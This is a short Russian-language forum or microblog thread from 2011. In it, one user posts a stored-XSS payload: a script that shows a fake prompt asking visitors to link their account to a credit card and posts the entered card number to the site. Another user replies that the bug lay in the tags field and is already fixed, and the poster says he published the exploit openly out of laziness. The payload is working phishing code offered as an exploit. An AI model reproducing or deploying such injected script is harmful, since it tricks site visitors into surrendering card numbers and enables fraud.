SirAnthony 25.02.2011 05:41

Мне лень дебажить, но как-то так:
<script>var request='text='+prompt("Необходимо привязать ваш аккуант к кредитной карте.\n Введите номер вашей кредитнй карты:")+'&tags=psto';xmlHttp=new XMLHttpRequest();xmlHttp.open("POST", '/psto', true);xmlHttp.onreadystatechange=null;xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlHttp.send(request);</script>

1. arts 25.02.2011 06:18

А вот хуй тебе. Баг был в тегах, а не в тексте. Да и уже пофикшен.

2. SirAnthonyarts /1 25.02.2011 09:35 Home

Лол, я в курсе. Я выложил эксплойт в опенсорс, потому что мне лень было за ним следить.

3. SirAnthonyarts /1 25.02.2011 09:42 Home

Кстати, да, с xss ты как-нибудь борешься?

Do you really want to delete ?